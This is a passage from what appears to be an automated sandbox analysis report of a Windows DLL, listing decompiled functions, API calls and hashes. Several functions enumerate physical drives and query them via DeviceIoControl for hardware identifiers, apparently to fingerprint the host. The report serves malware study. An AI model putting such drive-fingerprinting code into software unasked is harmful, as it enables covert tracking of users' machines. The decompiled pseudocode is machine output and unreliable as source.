                                                                                                                                                                  								_t76 = _a12;
                                                                                                                                                                  								_t107 = _t76;
                                                                                                                                                                  								_t86 = _v220;
                                                                                                                                                                  								if(_t76 != 0) {
                                                                                                                                                                  									 *_t76 = _t86;
                                                                                                                                                                  								}
                                                                                                                                                                  								E1000D1F0(0, _t96, _t97, _t97, _v208, _t86);
                                                                                                                                                                  								_t100 = _t100 + 0xc;
                                                                                                                                                                  								 *((char*)(_v220 + _t97)) = 0;
                                                                                                                                                                  							}
                                                                                                                                                                  							_v212( &_v216, _v208);
                                                                                                                                                                  							_t100 = _t100 + 8;
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				E100048F0(_t107,  &_v128,  &_v216);
                                                                                                                                                                  				return _t97;
                                                                                                                                                                  			}







































                                                                                                                                                                  APIs
                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 10004663
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                  • Opcode ID: 5a1338e426cb75d2ca51680c2dac79a4975bfac74c382e52e88c4a0326a2e4fd
                                                                                                                                                                  • Instruction ID: 6d5649bfcbb4bdf90b27f5f2c4f34706eb8148ffe7853cac92dd8e65470b9804
                                                                                                                                                                  • Opcode Fuzzy Hash: 5a1338e426cb75d2ca51680c2dac79a4975bfac74c382e52e88c4a0326a2e4fd
                                                                                                                                                                  • Instruction Fuzzy Hash: E34129B2408341AFD310CF54D88099BBBE8FBC8284F414A2EF59587215EB71E549CFA7
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001AB80(void* _a4, long _a8, long _a12) {
                                                                                                                                                                  				int _t5;
                                                                                                                                                                  
                                                                                                                                                                  				_t5 = VirtualFree(_a4, _a8, _a12); // executed
                                                                                                                                                                  				return _t5;
                                                                                                                                                                  			}





                                                                                                                                                                  APIs
                                                                                                                                                                  • VirtualFree.KERNELBASE(?,?,?), ref: 1001AB8F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeVirtual
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1263568516-0
                                                                                                                                                                  • Opcode ID: c9b92633b5be4d05357bd559152b14f70f0dc8abda5fe75a7777c4d758cee15d
                                                                                                                                                                  • Instruction ID: b8619c9825cd0fa0e3a42403664708fb370f354c31c9415efada841c1c062db3
                                                                                                                                                                  • Opcode Fuzzy Hash: c9b92633b5be4d05357bd559152b14f70f0dc8abda5fe75a7777c4d758cee15d
                                                                                                                                                                  • Instruction Fuzzy Hash: 29C04C7611420CABCB04DF98DCC4CAB37BDAB8C710B108508FB1D87200CA34F9518BA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                  C-Code - Quality: 85%
                                                                                                                                                                  			E1001D840(void* __edi, intOrPtr _a4) {
                                                                                                                                                                  				char _v8;
                                                                                                                                                                  				void* _v12;
                                                                                                                                                                  				void* _v16;
                                                                                                                                                                  				void* _v20;
                                                                                                                                                                  				void* _v24;
                                                                                                                                                                  				void* _v28;
                                                                                                                                                                  				void* _v32;
                                                                                                                                                                  				void* _v36;
                                                                                                                                                                  				void* _v40;
                                                                                                                                                                  				signed short* _v44;
                                                                                                                                                                  				void* _v48;
                                                                                                                                                                  				intOrPtr _v52;
                                                                                                                                                                  				intOrPtr _v56;
                                                                                                                                                                  				signed int* _v60;
                                                                                                                                                                  				char _v570;
                                                                                                                                                                  				short _v572;
                                                                                                                                                                  				char _v1596;
                                                                                                                                                                  				void* _v1600;
                                                                                                                                                                  				char _v1604;
                                                                                                                                                                  				long _v1608;
                                                                                                                                                                  				signed int _v1612;
                                                                                                                                                                  				void* _v1616;
                                                                                                                                                                  				void* _v1620;
                                                                                                                                                                  				void* _v1624;
                                                                                                                                                                  				void* _v1628;
                                                                                                                                                                  				void* _v1632;
                                                                                                                                                                  				signed int _v1633;
                                                                                                                                                                  				void _v1636;
                                                                                                                                                                  				char _v2148;
                                                                                                                                                                  				char _v2164;
                                                                                                                                                                  				void* _t88;
                                                                                                                                                                  				void* _t94;
                                                                                                                                                                  				void* _t123;
                                                                                                                                                                  				void* _t124;
                                                                                                                                                                  
                                                                                                                                                                  				_t123 = __edi;
                                                                                                                                                                  				_v52 = _a4;
                                                                                                                                                                  				if(_a4 == 0) {
                                                                                                                                                                  					L18:
                                                                                                                                                                  					return 0;
                                                                                                                                                                  				}
                                                                                                                                                                  				_v1600 = 0;
                                                                                                                                                                  				_v1612 = 0;
                                                                                                                                                                  				while(1 != 0) {
                                                                                                                                                                  					_v572 = 0;
                                                                                                                                                                  					E1000CF80(_t123,  &_v570, 0, 0x1fe);
                                                                                                                                                                  					wsprintfW( &_v572, L"\\\\.\\PhysicalDrive%d", _v1612);
                                                                                                                                                                  					_t124 = _t124 + 0x18;
                                                                                                                                                                  					_v48 = CreateFileW( &_v572, 0xc0000000, 3, 0, 3, 0, 0);
                                                                                                                                                                  					if(_v48 == 0xffffffff) {
                                                                                                                                                                  						L15:
                                                                                                                                                                  						_v1612 = 1 + _v1612;
                                                                                                                                                                  						if(_v1612 < 4) {
                                                                                                                                                                  							continue;
                                                                                                                                                                  						}
                                                                                                                                                                  						return _v1600;
                                                                                                                                                                  					}
                                                                                                                                                                  					_v1608 = 0;
                                                                                                                                                                  					_v1636 = 0;
                                                                                                                                                                  					_v1632 = 0;
                                                                                                                                                                  					_v1628 = 0;
                                                                                                                                                                  					_v1624 = 0;
                                                                                                                                                                  					_v1620 = 0;
                                                                                                                                                                  					_v1616 = 0;
                                                                                                                                                                  					if(DeviceIoControl(_v48, 0x74080, 0, 0,  &_v1636, 0x18,  &_v1608, 0) == 0) {
                                                                                                                                                                  						CloseHandle(_v48);
                                                                                                                                                                  						goto L15;
                                                                                                                                                                  					}
                                                                                                                                                                  					if((_v1633 & 0x000000ff) == 0) {
                                                                                                                                                                  						L11:
                                                                                                                                                                  						CloseHandle(_v48);
                                                                                                                                                                  						if(_v1600 == 0) {
                                                                                                                                                                  							goto L15;
                                                                                                                                                                  						}
                                                                                                                                                                  						return _v1600;
                                                                                                                                                                  					}
                                                                                                                                                                  					asm("sbb edx, edx");
                                                                                                                                                                  					_v1604 = ( ~((_v1633 & 0x000000ff) >> _v1612 & 0x00000010) & 0xffffffb5) + 0xec;
                                                                                                                                                                  					_v40 = 0;
                                                                                                                                                                  					_v36 = 0;
                                                                                                                                                                  					_v32 = 0;
                                                                                                                                                                  					_v28 = 0;
                                                                                                                                                                  					_v24 = 0;
                                                                                                                                                                  					_v20 = 0;
                                                                                                                                                                  					_v16 = 0;
                                                                                                                                                                  					_v12 = 0;
                                                                                                                                                                  					_v8 = 0;
                                                                                                                                                                  					E1000CF80(_t123,  &_v2164, 0, 0x210);
                                                                                                                                                                  					_t88 = E1001CF80( &_v40, _v1612, _v48,  &_v2164, _v1604,  &_v1608);
                                                                                                                                                                  					_t124 = _t124 + 0x24;
                                                                                                                                                                  					if(_t88 == 0) {
                                                                                                                                                                  						goto L11;
                                                                                                                                                                  					}
                                                                                                                                                                  					_v60 =  &_v1596;
                                                                                                                                                                  					_v44 =  &_v2148;
                                                                                                                                                                  					do {
                                                                                                                                                                  						 *_v60 =  *_v44 & 0x0000ffff;
                                                                                                                                                                  						_v44 =  &(_v44[1]);
                                                                                                                                                                  						_v60 =  &(_v60[1]);
                                                                                                                                                                  					} while (_v44 <  &_v1636);
                                                                                                                                                                  					_v56 = E1001CDD0( &_v1596);
                                                                                                                                                                  					_t94 = E1001D000(_v56, 0x104, _v52);
                                                                                                                                                                  					_t124 = _t124 + 0x10;
                                                                                                                                                                  					if(_t94 == 0) {
                                                                                                                                                                  						_v1600 = 1;
                                                                                                                                                                  					}
                                                                                                                                                                  					goto L11;
                                                                                                                                                                  				}
                                                                                                                                                                  				goto L18;
                                                                                                                                                                  			}





































                                                                                                                                                                  0x1001da60
                                                                                                                                                                  0x1001da65
                                                                                                                                                                  0x1001da6a
                                                                                                                                                                  0x1001da6c
                                                                                                                                                                  0x1001da6c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001da6a
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 1001D891
                                                                                                                                                                  • wsprintfW.USER32 ref: 1001D8AC
                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 1001D8CB
                                                                                                                                                                  • DeviceIoControl.KERNEL32 ref: 1001D943
                                                                                                                                                                  • _memset.LIBCMT ref: 1001D9CF
                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 1001DA7A
                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 1001DA97
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle_memset$ControlCreateDeviceFilewsprintf
                                                                                                                                                                  • String ID: \\.\PhysicalDrive%d
                                                                                                                                                                  • API String ID: 381188756-2935326385
                                                                                                                                                                  • Opcode ID: bf343d5d5fa73e07ffbe7669497774d3557a30f7b648ec5a239837437c2a4efd
                                                                                                                                                                  • Instruction ID: 9769834fe5c7fcaed127812980974d4bd2fdd9b920265f280a0c2248b2b16186
                                                                                                                                                                  • Opcode Fuzzy Hash: bf343d5d5fa73e07ffbe7669497774d3557a30f7b648ec5a239837437c2a4efd
                                                                                                                                                                  • Instruction Fuzzy Hash: EA615EB0D042189BEB20DF94CC95BDDB7B6EF84314F148199E5097B280DB76AAD8CF91
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                                                  			E1001DAD0(void* __edi, intOrPtr _a4) {
                                                                                                                                                                  				struct _OVERLAPPED* _v8;
                                                                                                                                                                  				struct _OVERLAPPED* _v12;
                                                                                                                                                                  				void* _v16;
                                                                                                                                                                  				short _v532;
                                                                                                                                                                  				struct _OVERLAPPED* _v536;
                                                                                                                                                                  				struct _OVERLAPPED* _v540;
                                                                                                                                                                  				void _v544;
                                                                                                                                                                  				long _v548;
                                                                                                                                                                  				struct _OVERLAPPED* _v552;
                                                                                                                                                                  				intOrPtr _v10532;
                                                                                                                                                                  				void _v10556;
                                                                                                                                                                  				char _v11556;
                                                                                                                                                                  				void* _t56;
                                                                                                                                                                  				void* _t70;
                                                                                                                                                                  				void* _t71;
                                                                                                                                                                  
                                                                                                                                                                  				_t70 = __edi;
                                                                                                                                                                  				E10018B00(0x2d20);
                                                                                                                                                                  				if(_a4 == 0) {
                                                                                                                                                                  					L13:
                                                                                                                                                                  					return 0;
                                                                                                                                                                  				}
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				_v552 = 0;
                                                                                                                                                                  				while(1 != 0) {
                                                                                                                                                                  					wsprintfW( &_v532, L"\\\\.\\PhysicalDrive%d", _v8);
                                                                                                                                                                  					_t71 = _t71 + 0xc;
                                                                                                                                                                  					_v16 = CreateFileW( &_v532, 0, 3, 0, 3, 0, 0);
                                                                                                                                                                  					if(_v16 == 0xffffffff) {
                                                                                                                                                                  						L10:
                                                                                                                                                                  						_v8 =  &(_v8->Internal);
                                                                                                                                                                  						_v552 = _v8;
                                                                                                                                                                  						if(_v8 < 4) {
                                                                                                                                                                  							continue;
                                                                                                                                                                  						}
                                                                                                                                                                  						return _v12;
                                                                                                                                                                  					}
                                                                                                                                                                  					_v548 = 0;
                                                                                                                                                                  					_v536 = 0;
                                                                                                                                                                  					_v544 = 0;
                                                                                                                                                                  					_v540 = 0;
                                                                                                                                                                  					E1000CF80(_t70,  &_v10556, 0, 0x2710);
                                                                                                                                                                  					_t71 = _t71 + 0xc;
                                                                                                                                                                  					if(DeviceIoControl(_v16, 0x2d1400,  &_v544, 0xc,  &_v10556, 0x2710,  &_v548, 0) != 0) {
                                                                                                                                                                  						E1000CF80(_t70,  &_v11556, 0, 0x3e8);
                                                                                                                                                                  						E1001D0A0(_v10532,  &_v10556,  &_v11556);
                                                                                                                                                                  						_t56 = E1001D000( &_v11556, 0x104, _a4);
                                                                                                                                                                  						_t71 = _t71 + 0x24;
                                                                                                                                                                  						if(_t56 == 0) {
                                                                                                                                                                  							_v12 = 1;
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  					CloseHandle(_v16);
                                                                                                                                                                  					if(_v12 == 0) {
                                                                                                                                                                  						_v8 = _v552;
                                                                                                                                                                  						goto L10;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						return _v12;
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				goto L13;
                                                                                                                                                                  			}



















                                                                                                                                                                  APIs
                                                                                                                                                                  • wsprintfW.USER32 ref: 1001DB1C
                                                                                                                                                                  • CreateFileW.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 1001DB38
                                                                                                                                                                  • _memset.LIBCMT ref: 1001DB81
                                                                                                                                                                  • DeviceIoControl.KERNEL32 ref: 1001DBB0
                                                                                                                                                                  • _memset.LIBCMT ref: 1001DBC8
                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 1001DC14
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$CloseControlCreateDeviceFileHandlewsprintf
                                                                                                                                                                  • String ID: \\.\PhysicalDrive%d
                                                                                                                                                                  • API String ID: 1858725146-2935326385
                                                                                                                                                                  • Opcode ID: 72aa308726503228d4dbb6d10f427f4c68655386cdf40f6154bcdc289d9c98a1
                                                                                                                                                                  • Instruction ID: 915ac6fd4bdffd3e24e0157f7485166cbeb8f51988887240e801f9576dbfd67f
                                                                                                                                                                  • Opcode Fuzzy Hash: 72aa308726503228d4dbb6d10f427f4c68655386cdf40f6154bcdc289d9c98a1
                                                                                                                                                                  • Instruction Fuzzy Hash: B3413F75E40218EBEB10EB90DC89FDDB7B8EB14704F104599E509AA2C1D7B4ABC8CF90
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 97%
                                                                                                                                                                  			E1001D3D0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                                                                                  				void* _v8;
                                                                                                                                                                  				struct _OVERLAPPED* _v12;
                                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                                  				signed int _v20;
                                                                                                                                                                  				void* _v24;
                                                                                                                                                                  				short _v540;
                                                                                                                                                                  				char _v1564;
                                                                                                                                                                  				long _v1568;
                                                                                                                                                                  				long _v1572;
                                                                                                                                                                  				intOrPtr _v1576;
                                                                                                                                                                  				struct _OVERLAPPED* _v1580;
                                                                                                                                                                  				struct _OVERLAPPED* _v1584;
                                                                                                                                                                  				struct _OVERLAPPED* _v1588;
                                                                                                                                                                  				struct _OVERLAPPED* _v1592;
                                                                                                                                                                  				struct _OVERLAPPED* _v1596;
                                                                                                                                                                  				struct _OVERLAPPED* _v1600;
                                                                                                                                                                  				struct _OVERLAPPED* _v1604;
                                                                                                                                                                  				void _v1608;
                                                                                                                                                                  				void* __ebp;
                                                                                                                                                                  				int _t63;
                                                                                                                                                                  				void* _t64;
                                                                                                                                                                  				int _t76;
                                                                                                                                                                  				void* _t77;
                                                                                                                                                                  				void* _t96;
                                                                                                                                                                  				void* _t97;
                                                                                                                                                                  				void* _t98;
                                                                                                                                                                  				void* _t99;
                                                                                                                                                                  				void* _t100;
                                                                                                                                                                  
                                                                                                                                                                  				_t97 = __esi;
                                                                                                                                                                  				_t96 = __edi;
                                                                                                                                                                  				_t77 = __ebx;
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				_v16 = _a4;
                                                                                                                                                                  				_v1584 = 0;
                                                                                                                                                                  				_v1580 = 0;
                                                                                                                                                                  				do {
                                                                                                                                                                  					wsprintfW( &_v540, L"\\\\.\\PhysicalDrive%d", _v12);
                                                                                                                                                                  					_t99 = _t99 + 0xc;
                                                                                                                                                                  					_v24 = CreateFileW( &_v540, 0xc0000000, 7, 0, 3, 0, 0);
                                                                                                                                                                  					if(_v24 != 0xffffffff) {
                                                                                                                                                                  						_v1572 = 0;
                                                                                                                                                                  						_v1608 = 0;
                                                                                                                                                                  						_v1604 = 0;
                                                                                                                                                                  						_v1600 = 0;
                                                                                                                                                                  						_v1596 = 0;
                                                                                                                                                                  						_v1592 = 0;
                                                                                                                                                                  						_v1588 = 0;
                                                                                                                                                                  						_t63 = DeviceIoControl(_v24, 0x74080, 0, 0,  &_v1608, 0x18,  &_v1572, 0);
                                                                                                                                                                  						__eflags = _t63;
                                                                                                                                                                  						if(_t63 != 0) {
                                                                                                                                                                  							_t64 = L1000CEAF(_t77,  &_v1608, _t96, _t97, 0x221);
                                                                                                                                                                  							_t100 = _t99 + 4;
                                                                                                                                                                  							_v8 = _t64;
                                                                                                                                                                  							 *((char*)(_v8 + 0xa)) = 0xec;
                                                                                                                                                                  							_v1568 = 0;
                                                                                                                                                                  							__eflags = DeviceIoControl(_v24, 0x7c088, _v8, 0x21, _v8, 0x221,  &_v1568, 0);
                                                                                                                                                                  							if(__eflags == 0) {
                                                                                                                                                                  								L10:
                                                                                                                                                                  								CloseHandle(_v24);
                                                                                                                                                                  								_push(_v8);
                                                                                                                                                                  								E1000CA40(_t77, _t96, _t97, __eflags);
                                                                                                                                                                  								_t99 = _t100 + 4;
                                                                                                                                                                  								__eflags = _v1584;
                                                                                                                                                                  								if(_v1584 == 0) {
                                                                                                                                                                  									_v12 = _v1580;
                                                                                                                                                                  									goto L13;
                                                                                                                                                                  								}
                                                                                                                                                                  								break;
                                                                                                                                                                  							}
                                                                                                                                                                  							_v20 = 0;
                                                                                                                                                                  							do {
                                                                                                                                                                  								 *(_t98 + _v20 * 4 - 0x618) =  *(_v8 + 0x10 + _v20 * 2) & 0x0000ffff;
                                                                                                                                                                  								_v20 = _v20 + 1;
                                                                                                                                                                  								__eflags = _v20 - 0x100;
                                                                                                                                                                  							} while (_v20 < 0x100);
                                                                                                                                                                  							_v1576 = E1001CDD0( &_v1564);
                                                                                                                                                                  							_t76 = E1001D000(_v1576, 0x104, _v16);
                                                                                                                                                                  							_t100 = _t100 + 0x10;
                                                                                                                                                                  							__eflags = _t76;
                                                                                                                                                                  							if(__eflags == 0) {
                                                                                                                                                                  								_v1584 = 1;
                                                                                                                                                                  							}
                                                                                                                                                                  							goto L10;
                                                                                                                                                                  						}
                                                                                                                                                                  						goto L13;
                                                                                                                                                                  					}
                                                                                                                                                                  					L13:
                                                                                                                                                                  					_v12 =  &(_v12->Internal);
                                                                                                                                                                  					_v1580 = _v12;
                                                                                                                                                                  				} while (_v12 < 4);
                                                                                                                                                                  				return _v1584;
                                                                                                                                                                  			}

                                                                                                                                                                  APIs
                                                                                                                                                                  • wsprintfW.USER32 ref: 1001D40A
                                                                                                                                                                  • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000003,00000000,00000000), ref: 1001D429
                                                                                                                                                                  • DeviceIoControl.KERNEL32 ref: 1001D4A2
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ControlCreateDeviceFilewsprintf
                                                                                                                                                                  • String ID: \\.\PhysicalDrive%d
                                                                                                                                                                  • API String ID: 3081802084-2935326385
                                                                                                                                                                  • Opcode ID: 785b4095dcf1ad38b12bd82e7762c96a16d820994563cc4dfa42c82c3201bccd
                                                                                                                                                                  • Instruction ID: f26b544c4fccea81e18431b955f202ed2237751288ed87d0487abbb64b72177a
                                                                                                                                                                  • Opcode Fuzzy Hash: 785b4095dcf1ad38b12bd82e7762c96a16d820994563cc4dfa42c82c3201bccd
                                                                                                                                                                  • Instruction Fuzzy Hash: 38512EB4D00218EFEB10DF94CC85BDEB7B5EB84704F104599E509AB280D7B6AB94CF95
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 85%
                                                                                                                                                                  			E1000F05C(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                                                                                  				intOrPtr _v0;
                                                                                                                                                                  				void* _v804;
                                                                                                                                                                  				intOrPtr _v808;
                                                                                                                                                                  				intOrPtr _v812;
                                                                                                                                                                  				intOrPtr _t6;
                                                                                                                                                                  				intOrPtr _t11;
                                                                                                                                                                  				intOrPtr _t12;
                                                                                                                                                                  				intOrPtr _t13;
                                                                                                                                                                  				long _t17;
                                                                                                                                                                  				intOrPtr _t21;
                                                                                                                                                                  				intOrPtr _t22;
                                                                                                                                                                  				intOrPtr _t25;
                                                                                                                                                                  				intOrPtr _t26;
                                                                                                                                                                  				intOrPtr _t27;
                                                                                                                                                                  				intOrPtr* _t31;
                                                                                                                                                                  				void* _t34;
                                                                                                                                                                  
                                                                                                                                                                  				_t27 = __esi;
                                                                                                                                                                  				_t26 = __edi;
                                                                                                                                                                  				_t25 = __edx;
                                                                                                                                                                  				_t22 = __ecx;
                                                                                                                                                                  				_t21 = __ebx;
                                                                                                                                                                  				_t6 = __eax;
                                                                                                                                                                  				_t34 = _t22 -  *0x103342d8; // 0x19e36f22
                                                                                                                                                                  				if(_t34 == 0) {
                                                                                                                                                                  					asm("repe ret");
                                                                                                                                                                  				}
                                                                                                                                                                  				 *0x10335a58 = _t6;
                                                                                                                                                                  				 *0x10335a54 = _t22;
                                                                                                                                                                  				 *0x10335a50 = _t25;
                                                                                                                                                                  				 *0x10335a4c = _t21;
                                                                                                                                                                  				 *0x10335a48 = _t27;
                                                                                                                                                                  				 *0x10335a44 = _t26;
                                                                                                                                                                  				 *0x10335a70 = ss;
                                                                                                                                                                  				 *0x10335a64 = cs;
                                                                                                                                                                  				 *0x10335a40 = ds;
                                                                                                                                                                  				 *0x10335a3c = es;
                                                                                                                                                                  				 *0x10335a38 = fs;
                                                                                                                                                                  				 *0x10335a34 = gs;
                                                                                                                                                                  				asm("pushfd");
                                                                                                                                                                  				_pop( *0x10335a68);
                                                                                                                                                                  				 *0x10335a5c =  *_t31;
                                                                                                                                                                  				 *0x10335a60 = _v0;
                                                                                                                                                                  				 *0x10335a6c =  &_a4;
                                                                                                                                                                  				 *0x103359a8 = 0x10001;
                                                                                                                                                                  				_t11 =  *0x10335a60; // 0x0
                                                                                                                                                                  				 *0x1033595c = _t11;
                                                                                                                                                                  				 *0x10335950 = 0xc0000409;
                                                                                                                                                                  				 *0x10335954 = 1;
                                                                                                                                                                  				_t12 =  *0x103342d8; // 0x19e36f22
                                                                                                                                                                  				_v812 = _t12;
                                                                                                                                                                  				_t13 =  *0x103342dc; // 0xe61c90dd
                                                                                                                                                                  				_v808 = _t13;
                                                                                                                                                                  				 *0x103359a0 = IsDebuggerPresent();
                                                                                                                                                                  				_push(1);
                                                                                                                                                                  				E10013ABF(_t14);
                                                                                                                                                                  				SetUnhandledExceptionFilter(0);
                                                                                                                                                                  				_t17 = UnhandledExceptionFilter(0x10024b30);
                                                                                                                                                                  				if( *0x103359a0 == 0) {
                                                                                                                                                                  					_push(1);
                                                                                                                                                                  					E10013ABF(_t17);
                                                                                                                                                                  				}
                                                                                                                                                                  				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                  			}




















                                                                                                                                                                  APIs
                                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 10016225
                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1001623A
                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(10024B30), ref: 10016245
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 10016261
                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 10016268
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2579439406-0
                                                                                                                                                                  • Opcode ID: 480ebdca2b22ee730782bbd644a46fe22bac3cf6626a4db92fe4ddcdd4ec90c9
                                                                                                                                                                  • Instruction ID: ee8eee148a0b36da5bac1509a6259723a028944e4d48fabcbe23e45d6083a592
                                                                                                                                                                  • Opcode Fuzzy Hash: 480ebdca2b22ee730782bbd644a46fe22bac3cf6626a4db92fe4ddcdd4ec90c9
                                                                                                                                                                  • Instruction Fuzzy Hash: 7B21D2B8802224DFD702DF65DCC46453BBCFB88315F915619E90D8EBA2EB709985EF05
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                                                  			E100215A0(void* __ebx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr* _a36) {
                                                                                                                                                                  				char _v8;
                                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                                  				char* _v20;
                                                                                                                                                                  				char _v24;
                                                                                                                                                                  				char _v28;
                                                                                                                                                                  				char _v543;
                                                                                                                                                                  				char _v544;
                                                                                                                                                                  				char _v807;
                                                                                                                                                                  				char _v808;
                                                                                                                                                                  				char* _v812;
                                                                                                                                                                  				char _v1079;
                                                                                                                                                                  				char _v1080;
                                                                                                                                                                  				char* _v1084;
                                                                                                                                                                  				char* _v1088;
                                                                                                                                                                  				char _v1599;
                                                                                                                                                                  				char _v1600;
                                                                                                                                                                  				intOrPtr _v1604;
